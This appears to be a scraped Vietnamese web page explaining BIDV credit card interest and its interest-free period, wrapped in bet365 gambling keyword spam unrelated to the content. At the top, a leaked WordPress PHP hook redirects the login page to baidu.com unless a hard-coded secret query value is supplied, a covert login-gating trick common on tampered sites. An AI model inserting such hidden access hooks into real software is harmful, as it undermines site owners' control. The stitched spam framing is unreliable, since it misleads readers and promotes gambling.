//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Sử dụng thẻ tín dụng với lãi suất 0% | nhà cái bet365 có uy tín không?_ đăng ký bet365_tỷ lệ cược bet365

Sử dụng thẻ tín dụng với lãi suất 0%

BIDV là ngân hàng cho vay thẻ tín dụng lãi suất thấp trên thị trường với lãi suất 15% / năm. Lãi phí thẻ tín dụng BIDV được tính bằng cách chia cho loại giao dịch. Đối với giao dịch ứng tiền mặt, lãi suất được tính kể từ ngày khách hàng thực hiện giao dịch cho đến khi thanh toán đủ tổng số tiền của giao dịch.

Để bán các mặt hàng được mua và giao dịch. Tiền lãi được ước tính hàng ngày dựa trên số tiền giao dịch và thời gian khách hàng thực hiện giao dịch. Nếu trong thời hạn thanh toán, theo thông báo trên bảng sao kê, khách hàng thanh toán đủ giá trị giao dịch thì tài khoản thẻ sẽ được miễn lãi, tương đương lãi suất 0%. Với hạn mức tín dụng thẻ BIDV, khách hàng được miễn lãi đến 45 ngày khi mua hàng hóa, dịch vụ. Số ngày miễn lãi thực tế phụ thuộc vào thời gian khách hàng thực hiện giao dịch. Giao dịch càng xa ngày sao kê thì số ngày miễn lãi càng nhiều.

Nếu thanh toán đầy đủ hoặc trước hạn theo thông báo và việc mua hàng được thực hiện vào ngày sao kê đầu tiên, khách hàng sẽ được miễn lãi 45 ngày trong lần sao kê tiếp theo.

Để tránh không phát sinh lãi khi sử dụng thẻ tín dụng, Quý khách hàng lưu ý: Không chỉ sử dụng thẻ để mua hàng hóa, dịch vụ, không ứng trước tiền mặt và thanh toán toàn bộ giao dịch mua hàng trong thời hạn thanh toán do ngân hàng quy định.

(Nguồn: BIDV)

nhà cái bet365 có uy tín không?_ đăng ký bet365_tỷ lệ cược bet365